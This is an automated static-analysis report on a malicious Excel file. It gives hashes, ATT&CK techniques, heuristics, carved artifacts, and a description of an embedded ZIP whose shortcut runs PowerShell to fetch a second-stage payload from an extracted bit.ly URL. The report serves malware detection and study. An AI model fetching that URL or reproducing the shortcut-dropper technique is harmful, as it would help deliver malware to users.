Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0a31a6b920b9fac5…

MALICIOUS

Office (OOXML)

17.9 KB Created: 2018-11-03 15:16:32 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2019-09-30
MD5: aaad699964d8f55d1cfd12bcbcc40192 SHA-1: 9e26ad999517fab78353e888fc2b32cdf7df0964 SHA-256: 0a31a6b920b9fac5d8a2a8cc1d2c6cd3f7334d4e96eefd23edd4b57f1570c6ef
142 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.001 PowerShell T1204.002 Malicious File

The sample is an Office document containing an embedded OLE object that unpacks a ZIP archive. This archive contains a shortcut file (CryptoAlarm-scanner.lnk) which is configured to execute a PowerShell command. The PowerShell command is designed to download and execute a second-stage payload, likely establishing persistence via the Startup folder.

Heuristics 4

  • Ole10Native package archive contains executable member critical OFFICE_PACKAGE_ARCHIVE_RISKY_MEMBER
    The OLE Package payload is an archive that contains a shortcut, script, installer, or other executable-capable member. Embedding a zip whose contents execute on user open is a direct Office package dropper pattern.
  • Ole10Native package archive contains PowerShell downloader LNK critical OFFICE_PACKAGE_ARCHIVE_LNK_DOWNLOADER
    The OLE Package payload is an archive containing a Windows shortcut whose command line launches PowerShell and downloads a remote payload. This is direct user-execution malware delivery through Object Packager, not a Windows Shell icon parsing exploit.
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://bit.ly/ASCAN Embedded OLE package script

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 5120 bytes
SHA-256: 317c2e2d755460fe4bf6e0b970de28fa9f47b9d96b90478aeb762c83a1c75e81
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 2637 bytes
SHA-256: 8275b8d398b6669012a17000ae46fd5f458e12e39071a4da527fba9e7ca5bdd4
ooxml_oleobject_00_ole10native_00_Crypto-Alarm.zip ole-package-payload OOXML xl/embeddings/oleObject1.bin Ole10Native payload: display_name=Crypto-Alarm.zip; full_path=C:\Users\r\AppData\Local\Temp\Crypto-Alarm.zip; temp_path=; def_file= 2313 bytes
SHA-256: 221a269729d48388e20dca70dd388f536edd472eec545971ead990d3bf34c2a7
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 5028 bytes
SHA-256: b86eeef9003d1a4808d4009d3efceff1b325dd37b6db286cff5dcdf057c541c3

Open this report in the interactive analyzer, or submit your own file for analysis.